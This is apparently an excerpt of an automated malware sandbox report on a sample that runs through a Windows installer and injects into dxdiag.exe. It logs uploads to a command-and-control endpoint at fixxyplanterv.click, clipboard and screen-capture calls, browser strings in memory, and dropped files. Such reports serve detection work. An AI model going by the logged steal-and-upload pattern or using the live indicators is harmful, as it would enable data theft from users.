Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TP4A0GOX3LS9EZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12820Host: fixxyplanterv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HS01DAG7DF0SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15037Host: fixxyplanterv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AY3AN2ECC6589AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20216Host: fixxyplanterv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XFO1FXWQ01JOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1221Host: fixxyplanterv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SWU054U4IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 586097Host: fixxyplanterv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: fixxyplanterv.click

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: fixxyplanterv.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fixxyplanterv.click

Source: shi95F5.tmp.0.dr	String found in binary or memory: http://.css
Source: shi95F5.tmp.0.dr	String found in binary or memory: http://.jpg
Source: msit.msi.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: msit.msi.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: msit.msi.0.dr	String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
Source: dxdiag.exe, 00000007.00000003.1697639523.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1681864403.0000000002F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microX
Source: dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: msit.msi.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: msit.msi.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: msit.msi.0.dr	String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
Source: msit.msi.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: msit.msi.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: msit.msi.0.dr	String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0K
Source: msit.msi.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: shi95F5.tmp.0.dr	String found in binary or memory: http://html4/loose.dtd
Source: dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: msit.msi.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: msit.msi.0.dr	String found in binary or memory: http://ocsp.digicert.com0K
Source: msit.msi.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: msit.msi.0.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: msit.msi.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: dxdiag.exe, 00000007.00000003.1638111835.0000000005246000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: dxdiag.exe, 00000007.00000003.1651908747.000000000523D000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1652145664.0000000005241000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1662253193.0000000005243000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: dxdiag.exe, 00000007.00000003.1638111835.0000000005246000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: dxdiag.exe, 00000007.00000003.1651908747.000000000523D000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1652145664.0000000005241000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1662253193.0000000005243000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: dxdiag.exe, 00000007.00000003.1697924723.0000000002F73000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1676263312.0000000002F73000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000002.1708428233.0000000002EFF000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1662361641.0000000002F65000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1697639523.0000000002F72000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000002.1708678569.0000000002F72000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000002.1708428233.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1676727815.0000000002F72000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1676142921.0000000002F72000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1681864403.0000000002F72000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1672261175.0000000002F75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/
Source: dxdiag.exe, 00000007.00000002.1708678569.0000000002F72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/3
Source: dxdiag.exe, 00000007.00000002.1708428233.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/LL
Source: dxdiag.exe, 00000007.00000002.1708678569.0000000002F4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/api
Source: dxdiag.exe, 00000007.00000003.1672261175.0000000002F75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/apiDBcD
Source: dxdiag.exe, 00000007.00000002.1708428233.0000000002EFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/apiK
Source: dxdiag.exe, 00000007.00000003.1676727815.0000000002F72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/apijBqD
Source: dxdiag.exe, 00000007.00000003.1681695049.000000000525C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click:443/api
Source: dxdiag.exe, 00000007.00000003.1651908747.000000000523D000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1652145664.0000000005241000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1662253193.0000000005243000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbW
Source: dxdiag.exe, 00000007.00000003.1638111835.0000000005246000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: dxdiag.exe, 00000007.00000003.1637786015.00000000054D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: dxdiag.exe, 00000007.00000003.1637786015.00000000054D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: dxdiag.exe, 00000007.00000003.1651908747.000000000523D000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1652145664.0000000005241000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1662253193.0000000005243000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: msit.msi.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: dxdiag.exe, 00000007.00000003.1638111835.0000000005246000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: dxdiag.exe, 00000007.00000003.1637700500.00000000052BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: dxdiag.exe, 00000007.00000003.1637786015.00000000054D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: dxdiag.exe, 00000007.00000003.1637786015.00000000054D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: dxdiag.exe, 00000007.00000003.1637786015.00000000054D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: dxdiag.exe, 00000007.00000003.1637786015.00000000054D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49719 version: TLS 1.2

Source: C:\Windows\SysWOW64\dxdiag.exe

Code function: 7_2_004303F0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

7_2_004303F0

Source: C:\Windows\SysWOW64\dxdiag.exe

Code function: 7_2_004303F0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

7_2_004303F0

Source: C:\Windows\SysWOW64\dxdiag.exe

Code function: 7_2_00431262 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

7_2_00431262

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\599bb2.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA16F.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA1CE.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA20D.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA23D.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA28C.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA2BC.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA2EC.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA416.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA455.tmp	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSIA16F.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00435870	7_2_00435870
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00415971	7_2_00415971
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00408920	7_2_00408920
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0043CA10	7_2_0043CA10
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0040AAE0	7_2_0040AAE0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00420B10	7_2_00420B10
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0040E458	7_2_0040E458
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0043D400	7_2_0043D400
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00425480	7_2_00425480
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00435530	7_2_00435530
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00438640	7_2_00438640
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0043A7F4	7_2_0043A7F4
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_004227B0	7_2_004227B0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0043D040	7_2_0043D040
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00414860	7_2_00414860
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00433875	7_2_00433875
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00425800	7_2_00425800
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00425820	7_2_00425820
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0042683C	7_2_0042683C
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0041D0C0	7_2_0041D0C0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_004230C0	7_2_004230C0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_004238F0	7_2_004238F0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00403950	7_2_00403950
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0040F116	7_2_0040F116
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0040E122	7_2_0040E122
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0040B124	7_2_0040B124
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_004281C0	7_2_004281C0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0040D9D6	7_2_0040D9D6
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0042A9D5	7_2_0042A9D5
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_004061E0	7_2_004061E0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_004231F6	7_2_004231F6
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00405980	7_2_00405980
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00436980	7_2_00436980
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00414860	7_2_00414860
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0043BA70	7_2_0043BA70
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00412200	7_2_00412200
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00426A10	7_2_00426A10
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00419219	7_2_00419219
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0042AAC6	7_2_0042AAC6
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_004092D0	7_2_004092D0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0042AAD7	7_2_0042AAD7
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_004082F0	7_2_004082F0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_004362F0	7_2_004362F0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0041DA80	7_2_0041DA80
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0042AA8A	7_2_0042AA8A
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00438A90	7_2_00438A90
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00427365	7_2_00427365
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0040FB71	7_2_0040FB71
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00404300	7_2_00404300
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0041BB20	7_2_0041BB20
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0041C330	7_2_0041C330
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00436BE4	7_2_00436BE4
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00402B90	7_2_00402B90
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00407450	7_2_00407450
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00404C50	7_2_00404C50
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00434463	7_2_00434463
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00415460	7_2_00415460
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00434C70	7_2_00434C70
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00427C0F	7_2_00427C0F
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0041D4C0	7_2_0041D4C0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0043CCF0	7_2_0043CCF0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0041EC80	7_2_0041EC80
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0042E480	7_2_0042E480
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0042456F	7_2_0042456F
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00421D73	7_2_00421D73
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00438D70	7_2_00438D70
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00417D74	7_2_00417D74
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00424DD0	7_2_00424DD0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00405E40	7_2_00405E40
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0041BE71	7_2_0041BE71
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00406670	7_2_00406670
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0040EE70	7_2_0040EE70
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0041CE00	7_2_0041CE00
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00434ED0	7_2_00434ED0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_004216E0	7_2_004216E0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0043B6F0	7_2_0043B6F0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00415FA1	7_2_00415FA1
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00417742	7_2_00417742
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00402F50	7_2_00402F50
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0041676A	7_2_0041676A
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00416F7C	7_2_00416F7C
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00419710	7_2_00419710
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00411712	7_2_00411712
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0040C72B	7_2_0040C72B
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00409730	7_2_00409730
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_004277E0	7_2_004277E0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0043B7E0	7_2_0043B7E0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0042779B	7_2_0042779B
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00415FA1	7_2_00415FA1
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0041A7A0	7_2_0041A7A0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0042456F	7_2_0042456F

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\MSI96A2.tmp D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F

Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: String function: 00407FE0 appears 50 times
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: String function: 00414850 appears 77 times

Source: msit.exe

